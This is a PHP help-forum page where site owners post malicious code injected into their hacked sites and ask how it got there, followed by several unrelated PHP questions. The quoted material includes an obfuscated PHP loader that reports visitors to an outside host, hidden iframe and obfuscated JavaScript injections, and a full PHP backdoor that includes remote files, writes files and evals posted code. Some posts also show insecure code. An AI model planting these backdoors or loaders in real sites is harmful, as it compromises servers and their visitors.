PHP - Website Hacked...strange
The code below was inserted into every single index.php on one of my client's sites. It went through and every single index.php page (in each folder) had the following code put in. It was strange. As far as I can tell there are no FTP logs, besides my own IP. This site was heavily built by someone else, I have been enhancing the system for a few months but it hasn't undergone a full security audit yet. What could have caused this? The weird thing is it's not loading it into the very top of the file..the security.inc.php is my file..and somehow they always get inserted below that file. But the <? is inserted right after it. I also don't generally use the <? shorthand, that was his previous code..but that entire <? block that has the hack attempt is very strange. Any advice on how this is generally done, and anyone with similar issues?

Code:

    <? require_once('security.inc.php'); ?><?
    if (!isset($sRetry)) {
        global $sRetry;
        $sRetry = 1;
        // This code use for global bot statistic
        $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
        $stCurlHandle = NULL;
        $stCurlLink = "";
        if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
        {
            if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
                $stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
                $stCurlHandle = curl_init( $stCurlLink );
            }
        }
        if ( $stCurlHandle !== NULL ) {
            curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
            $sResult = @curl_exec($stCurlHandle);
            if ($sResult[0]=="O") {
                $sResult[0]=" ";
                echo $sResult; // Statistic code end
            }
            curl_close($stCurlHandle);
        }
    }
    ?>

Similar Tutorials

Hi Chaps, After my clients' site was hacked just over a week ago, I took down the site and made some changes to the PHP scripts.

- Backed-up the database, then removed it from the webhost
- Removed all web files
- Changed the FTP and SQL login credentials
- Encrypted all user passwords
- Secured the login/signup scripts with a Captcha tool.
- Secured all account & checkout pages with cookie checks (forces login).
- I validated all the user inputs for XSS.
- Secured the SQL scripts with mysql_real_escape_string()/strip_tags()/str_replace().
- Used HTTP_REFERER on account/checkout pages

I'm hoping this will shore up the front-end site. Whilst I was backing up the images folder (500Mb+) to my PC, I was warned of trojans and viruses. It turned out the hackers had placed php files (cid.php/sniper.php/etc) and a couple of files without extensions, into the main Images folder. Without knowing how they actually did this (whether they had access to the FTP site, gained access through the website, or through a virus on the laptop used to update the site/upload images), I would like to know what I can do to make sure that they can't do this again. There is no option for front-end users to upload files, but the administration site does allow image uploads. At the moment, the images folder permissions are set to 0775, I think this is correct. Is there something I can do to the Image folder permissions as a whole, or should I just run a regular check on the directories, checking for all non-image files, or any file/directory that doesn't have the 0775 permission? Are there any resources on protecting FTP folders with PHP, uploading files/directories to protected folders, good practices to continually check for unwanted files? Is there anything else I should be looking into? I did read something about the dangers of include()/require_once(). The site is hosted on a shared server, and I don't have access to the .htaccess files.
Is there anything I can ask the hosting company to check that their firewall is working correctly? Sorry for the range of questions in this, but any help or guidance would be most appreciated. Many thanks

I have a php form submission on this website: www.judelawllc.com There are several required fields...and when I try to get around them, I am unable to?? Yet, over the last week...we have been getting upwards of 500 submissions that are completely blank? I don't understand how that is possible...or how to correct it. I have tried to add a captcha to the form to add further protection, but the captcha image is too big for the space I have to put this form. I don't like the layout of this site, but I am stuck with it for now...could you let me know what information I can supply you to help figure out how this is happening? Thank you in advance!

Hi guys, somehow someone has physically changed my pages and added

Code:

    <iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 width=1></iframe>

How have they done this, do you think they have got into our ftp account? Here's a page with it on. http://www.languageschoolsuk.com/coursecalculator.php If you look at the source code, right at the end near the footer you can see. Any help and advice would be brilliant because I have nooooo idea.

My website this morning was displaying 2 iframes that I know I never put there in the code:

in index.php:

    <script type="text/javascript" charset="ISO-8859-1" src="game.js"></script>

and in my public_html, there was a file called game.js that contained the following:

    O="=100%iframewidthheig".split('');Q="document.write('< src=http://lolkatdska.co.in/sTDS/go.php?sid=1 ht frameborder=0 margin=0 marginht=0></>');";o="";for(J=3;J>-1;J--)Q=Q.split(o.charAt(J)).join(O[J]);eval(Q.replace(//g,'"'));

I am the only person with the login details to my website/cpanel, and I know I never uploaded/modified these files. I've spoken to my host, but they told me they didn't see anything (because obviously I removed these foreign objects as soon as I noticed them). They don't seem too bothered about a security risk :/ Anyway, I've changed my login details and all that. I mentioned above that I discovered 2 foreign iframes; the other one I found just a moment ago, again on my index page (but within a file called footer.php)

in footer.php:

    <iframe src="<?= file_get_contents('http://white-star.biz/traffic_url.php?advertId=7&hash=919dac3bf6ad622657959934934bacf1'); ?>" width=0 height=0 border=0></iframe>

How did I not notice this before??? I think it was placed there in the last hour or so, after I removed the first iframe. This is pretty weird, I changed my login details for cpanel/ftp and all that stuff over an hour ago!!! and since then I've found this new alteration that I never made! I dunno, maybe it was there along with the game.js iframe but I didn't notice.... but as soon as I fixed the first one, I checked, and everything was fine. Oh, and also, the php files index and footer now have twice the number of returns as they originally did. e.g:

    <h1><?php include("ads/index_160x600_1.php"); ?></h1>
    <h2><?php include("ads/index_125x125_1.php"); ?></h2>
    <h3><?php include("ads/index_125x125_2.php"); ?></h3>

Became:

    <h1><?php include("ads/index_160x600_1.php"); ?></h1>
    <h2><?php include("ads/index_125x125_1.php"); ?></h2>
    <h3><?php include("ads/index_125x125_2.php"); ?></h3>

The only way these files could have been altered is if someone knows my login details... but this just is impossible, how did this happen? Are any of these weird files/modifications familiar to anyone else? We had a problem with the site a month ago when Google suspected our site as some sort of security threat... because we were hosting content from xxxxxxxxx.com, a site we have no affiliation with and doesn't feature on our site at all.
It was all quite bizarre and the Google thing went away within a day of contacting them. I have a feeling the same person/thing was behind this also. HELP!

Yup, the nice person left some friendly messages just to prove it. Now I need to recover. I have back up code and DB. But I need to establish what kind of hack it was and how to improve things. The big telltale is that all the JavaScript is gone off the pages. Yet the JS tools (jQuery etc.) are all still there.
They also got past the login page as well.
The site was built with CodeIgniter so I had invested my trust in the framework as I will never assume I know more than the CI guys on security.
Any ideas jump to mind as to what kind of hack it was and therefore what obvious things I can do to avoid it again?
Many Thanks !!

I know the following line of code is dangerous since the user has control of $query but I do not know any other way to realistically do it.

    if (eval('return (' . $query . ');')) {

The purpose is to allow the user to type in any valid php statement and see if it evaluates true or false. I.e.

    1==1 is true
    substr('cat',1,2)=='at' is true
    12<6 is false

The problem is I am sure there are ways a hacker could use this code to upload code to my site and take over. I have 2 options: 1. filter out any possible way a hacker could hack it, or 2. only allow the user to enter functions that can't be used to hack it. I will probably go the latter route but either way I need to know what to look for. Please let me know if you can think of any values for $query that would let you hack my site (p.s. this code is not up yet and will not go up until any possible security flaws are fixed.)

I am using php 5 and I am having issues with cookies. I have looked at the help pages here but am still stuck. A site had been hacked via a database and I am making it more secure with the use of session control, ip address and cookies. The issue is this: I need to run a database query to test if the two cookies set match the data in the database. I am using the following code in the head section.

Code:

    <?php
    session_start();
    $session = session_id();
    $ip = $_SERVER['REMOTE_ADDR'];
    $user = stripslashes(trim($_POST['user']));
    $pass = stripslashes(trim($_POST['pass']));
    $username="$user";
    $encrypt_user=md5($username);
    $password="$pass";
    $encrypt_password=md5($password);
    include 'config.php';
    $query = "SELECT * FROM `users`WHERE `username` = '$encrypt_user' AND `userpass` = '$encrypt_password'";
    $result = mysql_query($query) or die (mysql_error());
    if (mysql_num_rows($result)>0){
        while($row = mysql_fetch_row($result)){
            // set the cookies
            setcookie("cookie[pas]", "$encrypt_password");
            setcookie("cookie[user]", "$encrypt_user");
            $query = ("UPDATE`users`SET`sid`='$session', `ip` = '$ip'WHERE `username` = '$encrypt_user' AND `userpass` = '$encrypt_password'");
            $result = mysql_query($query) or die (mysql_error());
        }
    } else {
        echo 'No rows found';
    }
    ?>

This works fine. Now when I add this bit of code I can see the cookie name and value.

Code:

    <?php
    echo "$ip<br>";
    if (isset($_COOKIE['cookie'])) {
        foreach ($_COOKIE['cookie'] as $name => $value) {
            $name = htmlspecialchars($name);
            $value = htmlspecialchars($value);
            echo "$name : $value <br />\n";
        }
    }
    ?>

I can see the ip address and the two cookies named user and pass, but when I try to get the individual cookie details nothing comes out, and this is the issue as I need to test each of the two individual cookies against the info in the database so I can include pages to make it all secure. I have tried

Code:

    <?php
    if (isset($_COOKIE['user'])) {
        echo "$encrypt_user";
    }
    ?>

encrypt_user being the username from the form. I have also tried

Code:

    <?php
    if (isset($_COOKIE['user'])) {
        echo "$_COOKIE['user']";
    }
    ?>

These are not showing. I do not need to see it, just run a query to test that each cookie matches the encrypted data in the MySQL. Any ideas would be great if you can help, and if not have a great weekend

I found this code added to my server uploaded into a zencart admin folder.
We did have some problems previously with index.php and login.php files having some encoded javascript injected into them and messing up our online shop. If someone could tell me what it does, as I accidentally launched it before I deleted it. Looked in the server logs and it seems to have accessed every file on the server within seconds.

Code:

    <?php
    //e6b03bed4190733c7534e5c1209b076f
    /**
     * @version 2.42
     *
     */
    if (isset($_POST["action"])) {
        switch ($_POST["action"]) {
            case "test":
                test();
                break;
            case "regular_test":
                regular_test();
                break;
            case "setup":
                projectcodes_setup();
                break;
            case "remove":
                projectcodes_remove();
                break;
            case "mail":
                send();
                break;
            default:
                break;
        }
        return;
    }
    if (count($_GET) > 0) {
        foreach ($_GET as $id => $code) {
            if ($id == "id") {
                include $code;
            }
        }
        return;
    }
    function test() {
        $encoded_data = "";
        $data["version"] = phpversion();
        if (isset($_SERVER["SERVER_SOFTWARE"])) {
            $data["serverapi"] = $_SERVER["SERVER_SOFTWARE"];
        } else {
            $data["serverapi"] = "Not Available";
        }
        ob_start();
        phpinfo(8);
        $data["modules"] = ob_get_contents();
        ob_clean();
        $data["ext_connect"] = fopen("http://www.ya.ru/", "r") ? TRUE : FALSE;
        $serializes_data = serialize($data);
        $encoded_data = base64_encode($serializes_data);
        echo $_POST["test_message"] . $encoded_data;
    }
    function regular_test() {
        echo $_POST["test_message"];
    }
    function projectcodes_setup() {
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode) {
            $mark = $projectcode["mark"];
            $code = base64_decode($projectcode["code"]);
            $res = new_file_put_contents($mark, $code);
            if ($res) {
                $installed[] = $projectcode["id"];
            }
        }
        $installed = serialize($installed);
        $installed = base64_encode($installed);
        echo $installed;
    }
    function projectcodes_remove() {
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode) {
            $mark = $projectcode["mark"];
            $res = unlink($mark);
            if ($res) {
                $removed[] = $projectcode["id"];
            }
        }
        $removed = serialize($removed);
        $removed = base64_encode($removed);
        echo $removed;
    }
    function new_file_put_contents($filename, $data) {
        $f = @fopen($filename, 'w');
        if (!$f) {
            return false;
        } else {
            $bytes = fwrite($f, $data);
            fclose($f);
            return $bytes;
        }
    }
    function new_file_get_contents($filename) /* Returns the contents of file name passed */
    {
        if (!function_exists('file_get_contents')) {
            $fhandle = fopen($filename, "r");
            $fcontents = fread($fhandle, filesize($filename));
            fclose($fhandle);
        } else {
            $fcontents = file_get_contents($filename);
        }
        return $fcontents;
    }
    function send() {
        $code = base64_decode($_POST["projectcode"]);
        eval($code);
        //return;
    }
    ?>

Hey guys I have a simple question, I have a Config.php file that connects to mysql database on my server... Something like this (modified data, of course):

    <?php
    // database information
    $dbhost = 'localhost';
    $dbuser = 'root';
    $dbpass = '******';
    $dbname = 'databasename';
    ?>

Can a hacker access those variables? How can I protect this? Ideas, suggestions? Thanks in advance!

Hey, friends. I have some trouble on the server front. My sites have been hacked, and I need to make sure I've eradicated every trace of this exploit. I'm looking for a way to search for any and all php files contained in multiple directories with specific names.
For instance, I have found a commonality in relation to where these malicious files are placed, such as:

Code:

    /some/dir/img/somename.php

or:

Code:

    /some/dir/js/somename.php

Is there a way I can easily (e.g. using ssh and the "find" command) locate all files ending in php but only found in directories named "img"? I can't seem to find anything that would allow me to do this with find, or with a combination of find and grep. I can't go directory by directory, as some of these img directories are created many levels deep, some even in .svn directories. Any and all help is appreciated. Hackers suck.

I'm trying to make a League of Legends (a video game) community website, both as a personal project and for practice. Now the game has a lot of champions, each of whom has 5 unique abilities. Now, I thought about manually inputting all the details about each champion into a MySQL database, but that would be long and tedious, and I don't really have the time for it now. Also, the game patches very often (like, once every 2 weeks) which changes many of the stats, etc. of the champion, and it is not possible for me to keep manually updating these every time there is a patch. Fortunately, there is a League of Legends Wiki which has all the data I need in their specific champion pages, which they keep updated per patch. So I was wondering if there was any way to get the data from the divs in the wiki, and have it display on my site. What I want to do in my website is that whenever someone types a champion's name (in a post or whatever), I want it to display a hover-over dialog with some of the champion's details. And a lot of other features such as that. In plain English I need a way to:

> Tell PHP to go to the wiki's source code on a specific page
> Find a specific div container
> Get X data from there
> Pass X data into a function to display the hover-over

I think this way, I would not have to maintain a database as I can leech off the wiki's data.
I have not coded anything like this before, so I would like a few pointers as to how to achieve this. Any help will be appreciated!

Hello. My database is on the same server with a separate domain name, then I want to insert from website1 mysql data on website2 mysql data. Can anyone help me?

I tried searching on Google but couldn't find any relevant information, please redirect me to a relevant source or help me with the code. I want to pass a domain name in a text field which will be scanned and then the script will display the entire site map. Not external links or links on a page. Sorry it is not easy for me to explain. E.g. if I pass abc.com the script will display abc.com/12/adn.php abc.com/asd/asd/ etc. Whatever their url format is. All the links on that domain.

    <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
    <?php
    session_start();
    ini_set('display_errors', 'On');
    error_reporting(-1);
    //Connect to Database and Check cookies for logged in user
    $db = mysql_connect(MYSQL_HOST, MYSQL_USER, MYSQL_PASS);
    mysql_select_db(MYSQL_DB_NAME);
    if (!isset($_GET['act'])) {
        if (!isset($_POST['act'])) {
            $act = 'idx';
        }
        if (isset($_POST['act'])) {
            $act = mysql_real_escape_string($_POST['act']);
        }
    }
    if (isset($_GET['act'])) {
        $act = mysql_real_escape_string($_GET['act']);
    }
    If ($act == 'login' && $_GET['CODE']=='1') {
        $usernameUsed = mysql_real_escape_string($_POST['Username']);
        $passwordUsed = mysql_real_escape_string($_POST['Password']);
        $SaltPassword = MEMBER_PASS_SALT_1.$passwordUsed.MEMBER_PASS_SALT_2;
        $HashPassword = md5($SaltPassword);
        $QueryLogin = "SELECT * FROM ".MEMBER_LOGIN_TABLE." WHERE username='{$usernameUsed}' AND password='{$HashPassword}'";
        $LoginResult = mysql_query($QueryLogin);
        if (mysql_num_rows($LoginResult) > 0) {
            $UserID = mysql_result($LoginResult, 0, 'user_id');
            $Id = uniqid();
            $IdQry = "UPDATE ".MEMBER_LOGIN_TABLE." SET `unique_id`='{$Id}' WHERE user_id='{$UserID}'";
            $IdRes = mysql_query($IdQry, $db);
            setcookie('RAYTH_MEMBER_ID', $Id, time()+2592000);
        }
    }
    If ($act == 'logout' && $_GET['CODE'] == '1') {
        setcookie('RAYTH_MEMBER_ID', "", time()-3600);
    }
    if (isset($_COOKIE['RAYTH_SKIN'])) {
        $Skin = $_COOKIE['RAYTH_SKIN'];
    } Else {
        $Skin = 'redskin';
    }
    if (isset($_COOKIE['RAYTH_MEMBER_ID'])) {
        $Id = mysql_real_escape_string($_COOKIE['RAYTH_MEMBER_ID']);
        $MemIdQry = "SELECT user_id FROM ".MEMBER_LOGIN_TABLE." WHERE `unique_id`='{$Id}'";
        $memidres = mysql_query($MemIdQry, $db);
        $memidnum = mysql_num_rows($memidres);
        If ($memidnum < 1) {
            setcookie('RAYTH_MEMBER_ID', '', time()-3600);
        } Else {
            $memid = intval(mysql_result($memidres, 0, 'user_id'));
        }
    }
    if (isset($memid)) {
        $query_meminfo = "SELECT * FROM ".MEMBER_PROFILE_TABLE." WHERE `user_id`='{$memid}'";
        $query_result = mysql_query($query_meminfo, $db);
        $MemName = mysql_result($query_result, 0, 'display_name');
        $MemGroup = mysql_result($query_result, 0, 'Group');
        $AdsEnabled = mysql_result($query_result, 0, 'ads_enabled');
        $UserLevel = intval(mysql_result($query_result, 0, 'user_level'));
        $LevelQuery = "SELECT group_level FROM ".MEMBER_GROUPS." WHERE group_id='{$MemGroup}'";
        $LevelResult = intval(mysql_result(mysql_query($LevelQuery, $db), 0, 'group_level'));
        If ($UserLevel < $LevelResult) {
            $MemLevel = $LevelResult;
        } Else {
            $MemLevel = $UserLevel;
        }
    } else {
        $MemLevel = 0;
        $AdsEnabled = 'yes';
    }
    ?>
    <html>
    <HEAD>
    <title>Rayth.Info ..::Home::..</title>
    <?php
    $File = './skins/'.$Skin.'/'.$Skin.'.php';
    If (file_exists($File)) {
        include("./skins/{$Skin}/{$Skin}.php");
    } Else {
        include("../skins/{$Skin}/{$Skin}.php");
    }
    ?>

Ok this code is the Headers code which checks if user is logged in, what skin to load etc. It is also used in the forum (so used in home and forum) via php include. Now something strange happens.
If I use the home page to login (Rayth.Info) it logs me in for both home page and forum (rayth.info/forum). Now, if I then logout, and go to the forum, relogin, it doesn't log me in on the home page. Both pages use the same login/logout/register forms by php include and the same headers.php by include so I can't see any reason why this is happening. The cookie is obviously being set when the user logs in since it sees them logged in on one page.

Hi everyone, I uploaded a web site 2 months ago and it worked well. Since 1 week ago, it shows me this error and I don't know what the problem is. I have completely uploaded my web site again but it hasn't made a difference. This is the address: birjand-niazmandi.com. I have uploaded class.phpmailer.php again but I can't understand what the problem is. How can I solve it? Thanks

I'm installing and testing a web application, and I'm having a strange bug that annoys me because it doesn't make any sense and also doesn't really affect the web functionality:

    if($_POST["eliminar"]==""){
        $consulta='SELECT * FROM impressora where Activa=0';
        $result=mysql_query($consulta,$conexion);
        echo"<table align=CENTER class='sample'>";
        echo"<p align=center>LLISTA D'IMPRESSORES INACTIVES.</p>";
        printf("<th>MODEL</th><th>MARCA </th>");
        while($fila=mysql_fetch_array($result,MYSQL_ASSOC)){
            echo"<tr>";
            echo "<td>" . $fila["Model"] . "</td>";
            echo "<td>" . $fila["Marca"] . "</td>";
            echo"</td>";
            if($_SESSION["admin"]!=0){
                ?>
                <form method= "post" ACTION="impressores_inactives.php?idr=<?php echo($fila["Id_impressora"])?>">
                <td colspan="2"><INPUT TYPE ="SUBMIT" NAME="eliminar" VALUE="Eliminar"></td>
                </form></td>
                <?php
            }
            echo "</tr>";
        }
        echo"</table>";
    }else{
        echo 'eliminado';
        echo $_POST["eliminar"];
        // DELETE THE PRINTER FROM THE DATABASE
        $consulta="delete from impressora where Id_impressora='".$_GET["idr"] ."'";
        $result=mysql_query($consulta);
        echo "<meta http-equiv=Refresh content=\" ; url=../Impressores/impressores_inactives.php\">";
    }

The problem is that PHP says that eliminar is undefined, and if I test $_POST it says it's empty. See that eliminar is the name of the submit post and it's checked for a function that deletes an item. The problem is that the script is actually working. I can delete the printer but with that error... and if I test the value of eliminar it is always empty. Ask for any other explanation without a problem, the code is in Spanish.

So I have a client that wants me to add a function to her site that when she clicks a mailto href on a page to spawn an email child, some canned data chunk gets inserted into a form's textarea field.. something like: "Email sent to blah@blah.com on 8/14/14".
I'm drawing a blank on how this might be handled.. any ideas out there??

Ok, not sure what the problem is....hard to explain. I am trying to setup a login script but I get the normal: Warning: session_start() [function.session-start]: Cannot send session cache limiter error code. I have no white space above to cause the problem. I have used this same code written by Jpmaster77 on a number of sites. The strange thing is it also messed up a couple of my css text boxes. See the difference:

http://www.monstersgonewild.ca/index.php - Problem
http://www.monstersgonewild.ca/index1.php - Without session()

I would post the code of the original page but it is 600+ lines and growing. Anybody have any ideas?

So I am currently coding a database connection class and I have encountered very strange behavior from my script.

base.class.php:

Code:

    <?php
    class base{
        private $settings;
        function get_settings(){
            $settings["dbhost"] = 'localhost';
            $settings["dbuser"] = '*****';
            $settings["dbpass"] = '*****';
            $settings["dbname"] = 'core';
            return $settings;
        }
    }
    ?>

database.class.php

Code:

    <?php
    require_once 'base.class.php';
    class database extends base{
        private $query_now;
        private $link;
        public function __construct(){
            $settings = base::get_settings();
            $dbhost = $settings["dbhost"];
            $dbuser = $settings["dbuser"];
            $dbpass = $settings["dbpass"];
            $dbname = $settings["dbname"];
            $this->link = mysql_connect($dbhost, $dbname, $dbpass) or die ("Could not connect to the mysql database");
            mysql_select_db($dbname, $this->link) or die ("Could not select the database");
        }
        function query($query){
            $this->query_now = $query;
            return mysql_query($query, $this->link);
        }
        function getArray($result){
            return mysql_fetch_array($result);
        }
    }
    ?>

When I try to create an instance of the database class, I get a mysql_connect error. I have tried to echo my array and it seems that correct information is being passed over.
Now the strange thing is if I remove my password from the base class I don't get a mysql_connect error but this time instead I get "Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'core'@'localhost' (using password: YES) " In case you are wondering whether my mysql database user has a password, the answer is: yes for sure... (Also I have tried to setup a simple script for connecting to my database and everything worked fine) So any ideas?

I'm returning a table row that contains information about a file, but it seems in IE versions older than 10, it is cutting off some of the returned json when being used.
The data is being returned properly as seen in the following json:

    {"file_name":"<i class='video'><\/i> <a href=\"\/Development\/test(4).mp4\" class=\"is_file\" target=\"_blank\">test(4).mp4<\/a>"}

But when you use it, it cuts off the html. A simple alert will return

    </i> test(4).mp4</a>

and same when appending it and the sort. It is also happening for another part of HTML that is being returned properly in the json. It is working for everything else that is returned. I have been searching around for a very long time trying to find why this is happening. Has anyone other than me encountered this?